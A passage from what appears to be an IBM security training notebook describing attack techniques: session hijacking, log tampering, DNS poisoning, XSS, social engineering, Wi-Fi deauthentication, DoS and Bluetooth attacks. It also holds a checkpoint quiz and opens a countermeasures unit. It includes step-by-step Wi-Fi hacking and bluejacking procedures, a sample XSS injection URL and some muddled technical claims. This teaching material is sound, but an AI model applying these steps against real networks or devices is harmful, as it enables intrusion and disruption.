• Serious damage can be done by an attacker if both remote and local attacks are combined
• For example: The local host files which are present in a system can be altered by a system which
has been infected due to a Trojan that has been inserted in it
• The local host files will now redirect all the request of the user
• This kind of behavior has been observed many a times in a number of threats which arises due to
adware
• These certificates can easily be created by free tools like Open SSL
Figure 2-46. Banking Fraud Techniques (43 of 66) DS011.0
Notes:
Joint Forces
More serious damage can be done by an attacker if both remote and local attacks are combined. For
example: The local host files which are present in a system can be altered by a system which has been
infected due to a Trojan that has been inserted in it. The local host files will now redirect all the request of the
user which is made for going to the service provider to an IP address which is in the control of the user. This
kind of behavior has been observed many a times in a number of threats which arises due to adware. These
certificates can easily be created by free tools like Open SSL. Thus, the attacker is enabled such that SSL
connections which look official can be generated from the computer that has been infected. The infected
system makes a connection with the malicious server which is serving the website which has been spoofed.
There are very minimum chances that a user will notice these changes which have been made by the system.

V10.1
Student Notebook
Uempty
IBM Power Systems
• Web-application Threat Techniques

– Web security at the application level is often ignored
– Most security breaches online occur through the application rather than the server
– Some of these threat techniques are elaborated in the slides which follow
Notes:
Web-application Threat Techniques
Organizations spend millions to ensure that their online networks and servers are secure. However, Web
security at the application level is often ignored, or at least underrated. This is unfortunate, because today,
most security breaches online occur through the application rather than the server. Some of these threat
techniques are elaborated in the section which follows.
Student Notebook
IBM Power Systems

– Session Hijacking
• To sneak in to a system as a genuine user and hijack a system
• An attacker can hijack a genuine user’s session by finding an established session
• Once the session has been hijacked, the attacker can stay connected for hours without arousing
suspicion
• All routed traffic destined for the user’s IP address comes to the attacker’s system
Notes:
Session Hijacking
It is easier to sneak in to a system as a genuine user than to attempt to enter a system directly. An attacker
can hijack a genuine user’s session by finding an established session and taking it over after the user has
been authenticated. Once the session has been hijacked, the attacker can stay connected for hours without
arousing suspicion. All routed traffic destined for the user’s IP address comes to the attacker’s system. During
this time, the attacker can plant backdoors or even gain additional access to a system. The hijack can be
broken down into three broad phases which have been depicted in the figure below

V10.1
Student Notebook
Uempty
IBM Power Systems
Notes:
This diagram illustrates the steps involved in session hijacking. These steps have been discussed in more
detail in the slides which follow.
Student Notebook
IBM Power Systems

– Session Hijacking
• Step 1: Tracking the Connection
• Step 2: De-synchronizing the Connection
• Step 3: Injecting the attacker’s packet
Notes:
Step1: Tracking the Connection: The attacker uses a network sniffer to track a victim and host or uses a
tool like Nmap to scan the network for a target with a TCP sequence that is easy to predict. Once the victim is
identified, the attacker captures sequence and acknowledgment numbers from the victim. Because packets
are checked by TCP through sequence and/or acknowledgment numbers, the attacker uses these numbers
to construct packets.
Step 2: Desynchronizing the Connection: When there is an established or a stable connection with no data
transmission between the host and the target then this state is called desynchronized state. When the
sequence number of the client is not equal to the acknowledgement number of the server or vice-versa, then
also the state is called desynchronized state. The sequence or the acknowledgement number of the server
must be charged by the attacker in order to desynchronize the connection between the host and the target. To
achieve this state, null data is sent by the attacker to the server in order to advance the sequence number or
the acknowledgment number of the server. This happens without the knowledge of the machine which has
been targeted as it does not registers any augmentation. For example: Before de-synchronization, the
attacker monitors the session without any kind of interference. The attacker then sends a large amount of null
data to the server. These data change the ACK number on the server but do not affect anything else. Thus,
both the target and the server are desynchronized. The connection available on the server site can also be
brought down by sending a reset flag to the server. When the setup is in its early stage, then only this occurs.
There are mainly two goals of an attacker. First is breaking the connection on the side of the server and
second is creating a different connection with the various sequence numbers. A SYN or an ACK packet is
listened by the attacker which has been sent by the server for the host. A RST packet in sent immediately by

V10.1
Student Notebook
Uempty the attacker when the packet is detected. Also a SYN packet is sent by the attacker which is of the same
parameter as of the RST packet. Based on the SYN packet, the connection is closed and another one is
initiated. The sequence number of the SYN packet is different than the RST packet. A new connection is then
established and SYN or ACK packet is sent to the target for acknowledging it. After the RST packet is
received by the server, it closes the connection with the targeted system and another connection is initiated
which is based on the SYN packet. The packet is sent on the same port but the sequence number of the
packet is different. Now, the target is sent a SYN or ACK packet acknowledgement. An ACK packet is then
sent by the attacker after a new connection is detected. This state of the server is known as an established
state. To keep the target conversant is the main aim of this state. When the first SYN or ACK packet is
received from the server, then it must switch to establishment state. Now established but desynchronized
state is achieved on both the target and the server. FIN flag can also be used to do this, but the attack will be
given away in this way as the server will respond with an ACK. This response from the server is also known
as ACK storm.
This method of hijacking has a flaw embedded in it which causes the ACK storm to take place. Now, both
target and server are establish but are in a desynchronized state. A FIN flag can be used to do this. Now the
server will respond to this ongoing process by generating a ACK and will give away the attack by using an
ACK storm. There is a flaw in the method of TCP connection hijacking which makes this to take place. The
sequence number which is expected is sent by the host in order to ACK the packet which has been received.
An acknowledgment packet will now be generated after receiving a unacceptable packet which will create a
loop of endless nature for every data packet available. An access of traffic associate with the network will be
resultant by the mismatch in ACK and SEQ numbers in the target and the server which will try to verify the
correct sequence. No data is carried by these packets, thus they are not transmitted again if in case the
packet is lost. The conversion between the target and the server which is unwanted can be put to hand by a
single loss of packet.
This happens because IP is used by TCP in this process. In order to make sure the target host has no
knowledge about the attack, the stage of desynchronization is added to the sequence of hijacking. An
attacker is able to inject data to the server without desynchronization. The attacker can even keep the identity
by carrying out a IP address spoof.
Step 3: To Inject the Packet of the Attacker: After the connection between the server and the target has
been interrupted by the attacker, data can be injected by the attacker into the network or data can be passed
from the targeted system to the malicious server by participating actively as the man in the middle. Data can
also be read and injected freely.
Student Notebook
IBM Power Systems

– Log Tampering
• Web applications maintain logs to track the usage patterns of an application
• User logins, administrator logins, resources accessed, error conditions, and other application-
specific information are often maintained in logs
• These logs are used for proof of transactions, fulfillment of legal record retention requirements,
marketing analysis, and forensic incident analysis
• An attacker, in an attempt to cover tracks, will usually delete logs, modify logs, change user
information, and otherwise destroy all evidence of the attack
Notes:
Log Tampering
Web applications maintain logs to track the usage patterns of an application. User logins, administrator
logins, resources accessed, error conditions, and other application-specific information are often maintained
in logs. These logs are used for proof of transactions, fulfillment of legal record retention requirements,
marketing analysis, and forensic incident analysis. An attacker, in an attempt to cover tracks, will usually
delete logs, modify logs, change user information, and otherwise destroy all evidence of the attack. An
attacker who has control over the logs can change the following:
20031201 11:56:54 User login: josser
20031201 12:34:07 Administrator account created: drivel
20031201 12:36:43 Administrative access: drivel
20031201 12:45:19 Configuration file accessed: drivel
To:
20031201 11:56:54 User login: josser
20031201 12:50:14 User logout: josser

V10.1
Student Notebook
Uempty
IBM Power Systems

– Pharming
– The traffic is redirected to a fake host is this type of attack
– DNS that is Domain Name System is a very important part of the infrastructure of the internet
– A database which is hierarchical in nature is published by DNS which has all the server name in hierarchy
– Domain Name System Security Extension (DNSSEC) is an extension of DNS that provides three distinct
services:
> Key distribution
> Data origin authentication
> Transaction and request authentication
Notes:
Pharming
The traffic is redirected to a fake host is this type of attack. DNS cache poisoning is the most common
pharming attack among all the different methods. DNS that is Domain Name System is a very important part
of the infrastructure of the internet. A database which is hierarchical in nature is published by DNS which has
all the server name in hierarchy. DNS is designed as a distributed system. Local DNS resolvers are contacted
by clients in order to improve performance. These resolvers are maintained by local ISPs which can use the
name servers to cache records. Resolvers, name servers and clients constantly are in connection with one
another on the port no 53 of the UDP. Internet security relies heavily on DNS. Not only does internet security
depends on UDP but DKIM, SPF and SenderID also depend on it. Spoofed emails can easily come from
these counter measures which are signature based if by any chance DNS is compromised. If DNS is made to
respond with the server’s address of the phisher, then web spoofing can be conducted with ease. The local
DNS’s cache is fed with incorrect records when DNS cache poisoning is carried out. The address of the
source of a UDP packet can be easily spoofed when DNS runs over UDP. A query ID field of 16 bit is carried
by a DNS packet header. This packet header is very short and thus makes it very easy for a birthday attack to
be carried out.
Student Notebook
Domain Name System Security Extension (DNSSEC) is an extension of DNS that provides three distinct
services: key distribution, data origin authentication, and transaction and request authentication. Every DNS
record can be authenticated via a chain of trust. Cache poisoning is no longer possible because the phisher
cannot produce a correct signature without knowing the private key of the domain. However, DNSSEC is not
widely deployed yet.
Cache poisoning attacks can be mitigated by Google Public DNS which is also the largest public resolver of
the DNS in the whole world. It does this by adding the entropies to its queries with the help of the following
activity:
- By using a UDP port associated to the source and random in nature
- By choosing a server’s name randomly from the server name of a zone which are configured
- Randomize case in the query name, for example: wWw.eXaMpLe.CoM and WwW.ExamPLe.COm
are equivalent
- Add a nonce label to the query name, if the response is known to be a referral, for example: sending
entriih-f10r3.www.google.com in a query to root servers

V10.1
Student Notebook
Uempty
IBM Power Systems

– Cross-site Scripting Forgery
• Cross-site scripting is also called XSS
• An attack can be carried out by an attacker when a input from a user is used by a web application
• This web application once exploited by the attacker will do things which otherwise are not allowed
• This input can be propagated to other users as well
Notes:
Cross-site scripting Forgery
Cross-site scripting is also called XSS. Vulnerabilities occur when an attacker uses Web applications to send
malicious JavaScript code to end users. An attack can be carried out by an attacker when a input from a user
is used by a web application. This attack will be commenced by using the input which has been used by the
web-application. This input can be propagated to other users as well. The web application can also be
exploited by the attacker which the end user trusts completely. This web application once exploited by the
attacker will do things which otherwise are not allowed. Different methods are often used by the attackers in
order to encode that portion of the tag which is malicious in nature. It makes the user to believe that the
request which has been made is genuine. XSS attacks can generally be grouped into two categories: stored
and reflected. Attacks where the inserted code is stored permanently in a target server, database, message
forum, or visitor log are known as stored attacks. Reflected attacks are those where the injected code takes
another route to the victim, such as via an e-mail message, or on a different server. When a user is tricked
into clicking on a link or submitting a form, the code is injected into the vulnerable Web server, which reflects
the attack back to the user’s browser. The browser then executes the code because it comes from a trusted
server. XSS attacks cause different kinds of problems for the end user, ultimately resulting in a compromised
account. The most dangerous attacks involve stealing the user’s session cookies, thus allowing an attacker to
hijack the session and take over the user’s account. Other attacks involve the sharing of end-user files,
installing Trojan horse programs, redirecting users to other pages, and modifying the presentation of content.
Student Notebook
For example: A website is run by a company Z which allows users so that they can track the stocks which are
associated to their own portfolios. When the user logs in the website of the company, he is redirected to:
http://www.companyz.com/default.asp?nameRaghavAshima,
Now a server-side script is generated which also has a page to welcome the user and states:
“Welcome back, RaghavAshima!”
A database is used to store the stocks which are available on the portfolio of the above user. A cookies
placed by the website on the computer of the user which contains a key to that certain website. The website
is visited when the cookie available on the system of the user is retrieved. An attacker gets to know that this
website suffers from a certain vulnerability and thus decides to exploit this vulnerability such that confidential
information about the user of this website can be gained. An email is sent by the attacker to the user which
claims that he has won a lottery of 25 thousand dollar and he also sends a link where he can get all the
money. The URL sent will be shown as something below:
http://www.companyz.com/default.asp?name<script>evilScript()</script>
The user falls for the prey and click the link and also registers the name and the password associated with it.
Now HTML is generated by the web-server and it is sent to the browser which the user is using. Without any
prompting the script which has been received by the browser of the user is interpreted and run. The browser
quickly comprise if the script which has been sent asks the browser to send a cookie which contains a
portfolio stocks of the user. Below is a diagram which illustrated these concepts

V10.1
Student Notebook
Uempty
Web-application Threat Techniques (51 of 66) IBM ICE (Innovation Centre for Education)
IBM Power Systems
Figure 2-54. Web-application Threat Techniques (51 of 66) DS011.0
Notes:
This figure illustrates the steps involved in cross-site scripting technique.
Student Notebook
IBM Power Systems

– Cross-site Scripting Forgery
• Step 1: The link which has been sent from the hacker to the user is clicked by the user
• Step 2: A cross site scripting bug is present which generates a request to the website
• Step 3: Script which is malicious in nature is sent back to the web browser to the user
• Step 4: The malicious code is executed by the script host
• Step 5: The sensitive data is sent to the computer of the hacker
Notes:
This slide illustrates the step-by-step methodology of cross-site forgery in detail. The diagrammatic illustration
of the process of cross-site scripting forgery has been given in the previous slide.

V10.1
Student Notebook
Uempty
IBM Power Systems
• Physical Security
– CCTV cameras, locks, guards and alarms etc. are the common controls involved in physical security
– While these countermeasures are important in securing an information system physically but they are
not the only protections that must be considered
– Physical security is the protection of hardware, personnel, programs, data and networks from physical
events including natural disasters, fire, burglary, terrorism and theft etc.
Notes:
Physical Security
Most people generally think about CCTV cameras, locks, guards and alarms when they consider physical
security. While these countermeasures are important in securing an information system physically but they
are not the only protections that must be considered. All the countermeasures that are physical in nature fall
in physical security category. Physical security is the protection of hardware, personnel, programs, data and
networks from physical events including natural disasters, fire, burglary, terrorism and theft etc. through the
use of countermeasures such as suitable emergency preparedness, solid building construction, adequate
climate control, reliable power supplies etc.
The importance of physical security is often undervalued as Trojans, spywares and hacking are seen as more
dramatic and technical issues. But without physical security, the various existing software security
implementations becomes null and void as the intruder requires a limited amount of technical knowledge to
carry out a physical breach. Below are all the threat techniques which can be used to breach the physical
security in effect
Student Notebook
IBM Power Systems
• Physical security
– Dumpster diving
• To look for information in the thrash of someone else
• An attacker can dive in the dumpster of an organization to retrieve information life calendar, phone
list or the chart of an organization etc.
• All the media that is stored in the system of the organization must be erased and education of all
the employees is a must
Notes:
Dumpster Diving
To look for information in the thrash of someone else is known as dumpster diving. It is a technique which is
used to get information from the garbage of another person. This information can be used to carry out attack
on any computer network which can be devastating in nature. To search through the thrash for information
like password or access port is not the limit up to which dumpster diving is secluded. In order to gain access
to a certain network, an attacker can dive in the dumpster of an organization to retrieve information life
calendar, phone list or the chart of an organization etc. A disposal policy must be established by any
organization in order to prevent the dumpster divers such they can learn anything from their thrash. A
disposal policy must be established where all the papers which is in use by the employees of the organization
must be shred before they are recycled. Also all the media that is stored in the system of the organization
must be erased and education of all the employees is a must.

V10.1
Student Notebook
Uempty
IBM Power Systems
– Social Engineering
• This method relies heavily on the interaction made by the employees of the company
• This method involves to trick people such that they break the procedure of security which are
effective
• The natural helpfulness and weakness of an employee is another criteria that the social engineers
rely on
• For example: An authorized employee can be called by the social engineer that a certain problem
needs to be solved urgently which require access to the network on an immediate basis
Notes:
Social engineering
This method relies heavily on the interaction made by the employees of the company. It is a non-technical but
Very effective method of hacking and taking out information. This method involves to trick people such that
they break the procedure of security which are effective. A con game is run by a social engineer to get out
information from an employee of an organization. For example: A social engineer will try to gain the
confidence of a user who is authorized to access the computer network. If the social engineer is in the
confidence of that employee then the network of the computer can be breached easily. The natural
helpfulness and weakness of an employee is another criteria that the social engineers rely on. For example:
An authorized employee can be called by the social engineer that a certain problem needs to be solved
urgently which require access to the network on an immediate basis. To make an appeal to vanity, authority,
greed and eavesdropping of an old fashioned manner are some techniques of social engineering. Below are
some other social engineering types
Student Notebook
IBM Power Systems
– Social Engineering
• Baiting
• Phishing
• Pre-texting
• Spear phishing
• Tailgating
Notes:
Baiting: When a physical device infected with malware is left by an attacker in a place that it is sure that it will
be found and inserted into a system. This process is known as baiting. The malware is then installed
unintentionally into the system when the physical device is picked up by the user and inserted.
Phishing: When an email which is fraudulent is sent disguised as a genuine email by a malicious party, this
process is called phishing. The source is often purported as a trusted source. The recipient is tricked as the
message which has been sent installs malware on the system and then the financial or personal information
of the employee is shared.
Pre-texting: When a party lies to another party in order to gain access to the data which is confidential, this
process of attack is known as pre-texting. For example: An attacker could be involved in a pre-texting scam
who will pretend that some financial or personal information is needed in order to confirm the recipient’s
identity.
Spear phishing: This process of attack is similar to phishing, the only difference being that it is tailored for a
specific organization or individual. An attacker tries to uncover some specific information in these cases in
order to retrieve trade secrets or other data related to the finance of the organization.
Tailgating: When a party which is unauthorized follows an authorized party into a location which is secure
otherwise, this process is known as Tailgating. This is done to steel valuable information from an
organization. Subverting the access of the keycard is often involved to secure an area of an organization from
tailgating.

V10.1
Student Notebook
Uempty
IBM Power Systems
• Wireless Network Threat Techniques

– Wireless networking provides many advantages, but it also coupled with new security threats
– Although implementation of technological solutions is the usual respond to wireless security threats
and vulnerabilities
– Some of the wireless network threat techniques has been mentioned in the slides to follow
Notes:
Wireless Network Threat Techniques
Wireless networking provides many advantages, but it also coupled with new security threats
and alters the organization’s overall information security risk profile. Although implementation of
technological solutions is the usual respond to wireless security threats and vulnerabilities,
wireless security is primarily a management issue. Some of the wireless network threat
techniques has been mentioned in the slides to follow by which data available on the network
can be breached.
Student Notebook
IBM Power Systems

– Wi-Fi Hacking
• A wireless access point can be hacked only if one is close enough to the network
• 300 feet that is 100 meter is the limit of the access points
Notes:
Wi-Fi Hacking
A wireless access point can be hacked only if one is close enough to the network. 300 feet that is 100 meter
is the limit up to which most of the access point extends to, so the attacker doesn’t have to very close. The
next slide shows a diagrammatic illustration of the steps involved in Wi-Fi hacking.

V10.1
Student Notebook
Uempty
Wireless Network Threat Techniques (59 of 66) IBM ICE (Innovation Centre for Education)
IBM Power Systems
Figure 2-62. Wireless Network Threat Techniques (59 of 66) DS011.0
Notes:
The figure illustrates the steps involved in Wi-Fi hacking techniques. These steps have been discussed in
more detail in the slides which follow.
Student Notebook
IBM Power Systems

– Wi-Fi Hacking
• Step 1: Open a Terminal
• Step 2: Put the Wireless Adapter in Monitor Mode
• Step 3: Monitor the available Aps with Airodump-Ng
• Step 4: Connect to the Access Point
• Step 5: Broadcast De-authenticate Users on the AP
Notes:
Step 1: Open a Terminal: When an intruder’s position is in the range of the access point of the Wi-Fi,
BackTrack can be fired up by the intruder and terminal can be opened.
Step 2: Put the Wireless Adapter in Monitor Mode: To put the wireless adapter in the monitor mode with a
tool called airmon-ng is the next step involved in Wi-Fi hacking
Step 3: Monitor the Available APs with Airodump-Ng: By using airodump-ng, all the access points that are
in range are looked upon
Step 4: Connect to the Access Point: Now the computer of the system is connected with the access point.
The access point of BSSID can be spotted on the far left bottom. The client’s MAC address can also be seen
in the computer system. To carry out the next step of this hack, both of these information must be well known.
Step 5: Broadcast De-authenticate Users on the AP: The next step of this hack is to bump off or
de-authenticate all the users from the access point. De-authentication frames of thousands in number must
be sent to the server in order to keep all the employees from reconnecting with the main access point. The
following commands must be typed to carry out this process:
For example: If 00:09:5B:6F:64:1E is the BSSID of the AP and 44:6D:57:C8:58:A0 is the MAC address of our
computer, then 1000 is the number of de-authentication frames to send to the AP.

V10.1
Student Notebook
Uempty
IBM Power Systems

– DoS Attack
• A message is sent by the user in a typical connection in order to ask the server for authentication.
• When the user receives this approval then only he is allowed to access the server.
• Now when the server tries to send the approval of the requested authentication it is not able to
send it as all the report have false return addresses
• For some time now, DDoS/DoS attack have been pausing a lot of problem.
• These attacks are successful in many cases as the organization do not update their plans of
incident response nor do they turn their technologies for mitigating threads
Notes:
DoS Attack
A message is sent by the user in a typical connection in order to ask the server for authentication. This
authentication approval is returned by the server and sent to the user. When the user receives this approval
then only he is allowed to access the server. In a DoS attack or a Denial of Service attack, many requests of
authentication is sent by the user to the server which fills it up. Now when the server tries to send the
approval of the requested authentication it is not able to send it as all the report have false return addresses.
Thus the connection is closed by the server after waiting for more than a minute. The attacker now sends a
new batch of requests which are forged and the process of the server trying to give access begins again. For
some time now, DDoS/DoS attack have been pausing a lot of problem. These attacks are successful in many
cases as the organization do not update their plans of incident response nor do they turn their technologies
for mitigating threads. Traffic-flooding and high-volume techniques are the primarily used techniques to target
the service provider. A DoS attack can be employed by a malicious actor while it is going after some critical
information in a database of an e-commerce organization.
Student Notebook
Wireless Network Threat Techniques (62 of 66) IBM ICE (Innovation Centre for Education)
IBM Power Systems

– DoS Attack
• Step 1: Users are directed
• Step 2: Compromising the systems
• Step 3: DoS or DDoS attack are launched
• Step 4: Crashing of systems
Figure 2-65. Wireless Network Threat Techniques (62 of 66) DS011.0
Notes:
DoS Attack
Step 1: Unsuspecting users are directed by a malicious hyperlink or a phishing email to a website where their
systems can get infected by malwares and can be placed under the reason due to which malicious activities
are taking place
Step 2: The machines which have been compromised now a wait for the instructions from the bot controller in
order to attack a target. This is not known by the user. These bots remain idle for many days before they
come to action and attack the system
Step 3: The machines which have been compromised now launched DDoS or DoS attacks at the command
of the bot controller against the target
Step 4: The systems which are targeted are often overrun with traffic and are forced offline

V10.1
Student Notebook
Uempty
IBM Power Systems
• Bluetooth Device Threat Techniques

– The use of wireless communication systems and their interconnections via networks have grown
– RF communication are easier to use than wired or infrared communication, but it also makes
eavesdropping easier
– Because wireless RF communication can suffer threats, additional countermeasures are needed to
protect against them
Notes:
Bluetooth Device Threat Technique
The use of wireless communication systems and their interconnections via networks have grown rapidly in
recent years. Because RF (Radio Frequency) waves can penetrate obstacles, wireless devices can
communicate with no direct line-of-sight between them. This makes RF communication easier to use than
wired or infrared communication, but it also makes eavesdropping easier. Moreover, it is easier to disrupt and
jam wireless RF communication than wired communication. Because wireless RF communication can suffer
from these new threats, additional countermeasures are needed to protect against them.
Student Notebook
IBM Power Systems

– Blue Jacking
• Phone book manipulation attack is cause through bluejacking.
• The attacker can also transfer the data into his own device and can edit or misuse it according to
his needs
• This transferring of data into the hacker’s device is an example of Bluesnarfing attack
• Bluejacking can be done without engaging into any tedious process
Notes:
Blue-jacking
Phone book manipulation attack is cause through bluejacking. This attack allows the hacker to manipulate or
remove the data stored in the phone book. The attacker can also transfer the data into his own device and
can edit or misuse it according to his needs. This transferring of data into the hacker’s device is an example of
Bluesnarfing attack and the editing/deleting part falls into bluebugging category. Bluejacking can be done
without engaging into any tedious process, but rather requires a purely easy and short set of steps which are
mentioned as follows:

V10.1
Student Notebook
Uempty
IBM Power Systems

– Blue Jacking
• Step 1: First, access is gained to the contacts in the device (phonebook or Outlook)
• Step 2: A new contact is created by selecting “Create a Contact” option
• Step 3: A message is entered in the field where the contact name is supposed to be entered. This
message is from the attacker to alarm and scare the victim. The message is entered in the device
from which blue-jacking is to be done
• Step 4: This contact/message is now saved in the phonebook of the device
• Step 5: Now, this message is to be transmitted. This is done by sending the contact through
Bluetooth
• Step 6: After choosing the “Bluetooth” option to send contact/message, identify nearby devices and
then select the target device
• Step 7: The target device will now be blue-jacked after receiving the message
Notes:
The steps involved in Bluetooth device threat technique is explained in this slide. This slide describes that
how the internal system of a mobile device is hacked using the technique of Blue Jacking.
Student Notebook
IBM Power Systems

– Blue-bugging
• An attacker gains control of the phone book
• This attack is called blue-bugging.
• This attack causes a phone call initiation.
• Attacker can also use a different mechanism by which he can access the keypad of the target
phone
• This way, even if a call is initiated, it traces back to the victim’s number
Notes:
By gaining access to the phone book, an attacker has his the necessary doors kicked down to enter the
contacts list and hence initiate call to a particular contact This attack is called blue-bugging. This attack
causes a phone call initiation. The hacker can also access the call logs and can give a call to any of the
numbers present in the logs list. Attacker can also use a different mechanism by which he can access the
keypad of the target phone, thereby taking control of the victim’s device completely. This way, even if a call is
initiated, it traces back to the victim’s number
In the Petri-Net model, the hacker gains control of the victim’s device and can manipulate in in following ways:
• Open the contacts and go to “openpb” and goes to “connect” while initiating a call to a particular contact.
• Entering the call logs through the contacts list and initiate a call to any number
• Taking control of the keyboard and use its own keyboard to make a call

V10.1
Student Notebook
Uempty

IBM Power Systems
1. Malware threat technique can be carried out in how many steps?

– 4
– 5
– 3
– 7
2. Which of the following option shows the steps of malware threat technique in correct
order?
– Entry, Distribution, Exploit, Infect, Execute
– Distribution, Entry, Exploit, Infect, Execute
– Exploit, Entry, Exploit, Infect, Execute
– Infect, Entry, Exploit, Infect, Execute
3. Which of the following is a step of phising?

– Fake login page
– Creating phishing.php file
– Creating index.html page
Notes:
1. …
2. …
3. …
Student Notebook

IBM Power Systems
4. Which of the following option shows the steps of session hijacking in correct order?
– Tracking the Connection, Desynchronizing the Connection, Injecting the Attacker’s Packet
– Desynchronizing the Connection, Tracking the Connection, Injecting the Attacker’s Packet
– Injecting the Attacker’s Packet, Tracking the Connection, Injecting the Attacker’s Packet
5. How many steps are involved in blue-jacking?

– 5
– 4
– 7
– 10
6. Which of the following option shows the steps of buffer overflow in correct order?
– Entrance, Running Commands, Smashing the Stack
– Smashing the Stack, Entrance, Running Commands
– Entrance, Smashing the Stack, Running Commands
– Running Commands, Smashing the Stack, Entrance
Notes:
Write down your answers here:
4. . ….
5. . ….
6. . …

V10.1
Student Notebook
Uempty

IBM Power Systems
7. How many steps are involved in DOS attack?

– 3
– 6
– 5
– 4
8. How many steps are involved in Wi-Fi hacking?

– 4
– 5
– 6
– 3
Notes:
7. …
8. …
Student Notebook

IBM Power Systems
9. Which of the following is not a step of cross-site script forgery?

– This sends malicious script back to the user’s Web browser
– The script host executes the malicious code
– This sends the sensitive data to the hacker’s computer
10. What is tailgating?

– When a malicious party sends a fraudulent email disguised as a legitimate email
– When one party lies to another to gain access to privileged data
– When an unauthorized party follows an authorized party into an otherwise secure location, usually to
steal valuable property or confidential information
Notes:
Write down your answers here...
9. ...
10. ...

V10.1
Student Notebook
Uempty

IBM Power Systems

Notes:
Student Notebook

V10.1
Student Notebook
Uempty
Unit 3. Countermeasures

This unit is about
• Trends of Emerging Threats
• The Evolution of Information Security
• The Importance of Information Protection
• Countermeasures associated with data security

• To enumerate the countermeasures associated to the different fields of security

• Checkpoint
References
2009
© Copyright IBM Corp. 2015 Unit 3. Countermeasures 3-1

Student Notebook
Welcome to:
IT Data Security – Countermeasures
Figure 3-1. IT Data Security – Countermeasures DS011.0
Notes:

V10.1
Student Notebook
Uempty

IBM Power Systems

Notes:

Student Notebook
Introduction IBM ICE (Innovation Centre for Education)

IBM Power Systems
• There has been rapid advances in information technology (IT) systems
• The role of computer and internet networking has increased
• All the equipment in the network, computing systems and the different servers and the data
that they possess are subjected to the threats
© Copyright IBM Corporation 2014 3
Figure 3-3. Introduction DS011.0
Notes:
Introduction
In recent years, there have been rapid advances in information technology (IT) systems, particularly in the
fields of cloud computing and mobile digital devices; therefore Cybersecurity technologies are playing an
increasingly important role. The role of computer and internet networking has increased which means that
there new to employ new security policies and measures in order to minimize the threats and the
vulnerabilities which are associated with it. All the equipment in the network, computing systems and the
different servers and the data that they possess are subjected to the threats. In order to protect the
organizations form various threats to their security, various security countermeasures are employed. The
present security demands of an organization must be evaluated in order guarantee the security requirements
of an organization. An impact of negative stature is caused by a weakness in security in an organization. The
various objectives of security that are CIA or confidentiality, integrity and availability are the main cause of
concern.
The security countermeasures are used in organizations to protect information security objectives. These
measures assist an evaluator to measure the security level in an organization. This chapter enumerates all
the countermeasures which are applied to protect the data in an organization from getting breached.

V10.1
Student Notebook
Uempty
The Importance of Data Protection IBM ICE (Innovation Centre for Education)
IBM Power Systems
• Information is an important asset
• Information differentiates companies and provides leverage that helps one company become
more successful than another
• This is typically done in order to control access to the information in different ways,
depending on its importance, its sensitivity and its vulnerability to theft or misuse
• Organizations classify information in different ways in order to differently manage aspects of

its handling
Figure 3-4. The Importance of Data Protection DS011.0
Notes:
The Importance of Data Protection
Information is an important asset. The more information is at command, the better one can adapt to the world
around them. In business, information is often one of the most important assets a company possesses.
Information differentiates companies and provides leverage that helps one company become more
successful than another. Information can be classified into different categories.
This is typically done in order to control access to the information in different ways, depending on its
importance, its sensitivity and its vulnerability to theft or misuse. Organizations typically choose to deploy
more resources to control information that has higher sensitivity.
Organizations classify information in different ways in order to differently manage aspects of its handling,
such as labelling (whether headers, footers, and watermarks specify how it should be handled), distribution
(who gets to see it), duplication (how copies are made and handled), release (how it is provided to outsiders),
storage (where it is kept), encryption (if required), disposal (whether it is shredded or strongly wiped) and
methods of transmission (such as e-mail, fax, print and mail).
The specifics are spelled out in an organization’s information classification and handling policy, which
represents a very important component of an organization’s overall security policy.
Information intended for internal use only is usually meant to be seen by employees, contractors and service
providers, but not by the general public. Examples include internal memos, correspondence, general e-mail
and instant message discussions, company announcements, meeting requests, and general presentation

Student Notebook
materials. This type of information is typically the least restricted—because spending a lot of time and money
on protecting it doesn’t outweigh the value of the information or the risk of its disclosure. Companies may
have confidential information, such as research and development plans, manufacturing processes, strategic
corporate information, product roadmaps, process descriptions, customer lists and contact information,
financial forecasts, and earnings announcements that are intended for internal use on a need-to-know basis.
Loss or theft of confidential information could violate the privacy of individuals, reduce the company’s
competitive advantage, or cause damage to the company. Specialized information or secret information may
include trade secrets, such as formulas, production details, and other intellectual property, proprietary
methodologies and practices that describe how services are provided, research plans, electronic codes,
passwords, and encryption keys. If disclosed, this type of information may severely damage the company’s
competitive advantage. It is usually restricted to only a few people or departments within a company and is
rarely disclosed outside the company.
Thus protecting the information by applying suitable countermeasures is important in order to mitigate the
data breach. Countermeasures are able to minimize and mitigate the risks and thus the amount of data
breaches are minimized substantially.

V10.1
Student Notebook
Uempty
Evolution of Mitigation Technique (1 of 6) IBM ICE (Innovation Centre for Education)

IBM Power Systems
• Originally, the academic security model was “wide open” and the government security model
was “closed and locked.”
• In the early days of networking, individual computers were connected together only in
academic and government environments
Figure 3-5. Evolution of Mitigation Technique (1 of 6) DS011.0
Notes:
Evolution of threat mitigation techniques
In the early days of networking, individual computers were connected together only in academic and
government environments. Thus, at that time, the networking technologies that were developed were specific
to academic and government environments. Originally, the academic security model was “wide open” and the
government security model was “closed and locked.” There wasn’t much in between. The government was
mainly concerned with blocking access to computers, restricting internal access to confidential data, and
preventing interception of data (for example, by shielding equipment to prevent electromagnetic radiation
from being intercepted). This method of protecting assets provided a hard-to-penetrate perimeter, as depicted
in Fig. 1

Student Notebook

IBM Power Systems
Notes:
This figure illustrates the original government perimeter blockade model. It has been illustrated that how no
access was provided to the outsiders. The data which was present in the perimeter was made safe as no one
from outside could access it.

V10.1
Student Notebook
Uempty

IBM Power Systems
• In the academic world, the goal was to share information openly
• If we these two models are compared, it can be noted that these two models are
diametrically opposite
• The government model blocks everything, while the academic model allows everything
Notes:
In the academic world, the goal was to share information openly, so security controls were limited to
accounting functions in order to charge money for the use of computer time. Fig. 2 shows the original security
model for academic institutions. If we these two models are compared, it can be noted that these two models
are diametrically opposite. The government model blocks everything, while the academic model allows
everything. There is plenty of room in between these two extremes.

Student Notebook

IBM Power Systems
Notes:
This figure illustrates the original academic open-access model. It can be noticed that a academic model
allows every access which an outsider wants. Thus all the resources which have been employed inside are
not protected and can be breached easily. Also the data can be leaked from this model very easily.

V10.1
Student Notebook
Uempty

IBM Power Systems
• In the field of computer security, the practices established by the academic and government
institutions persisted until the early 1990s
• Those practices that have endured continue to have their place in a comprehensive security
strategy
• When businesses started to widely embrace the Internet as a sales channel and business
tool in the early-to-mid 1990s, a new security model was required
Notes:
In the field of computer security, the practices established by the academic and government institutions
persisted until the early 1990s, and some of those practices are still around today. Those practices that have
endured continue to have their place in a comprehensive security strategy, but they are no longer sufficient to
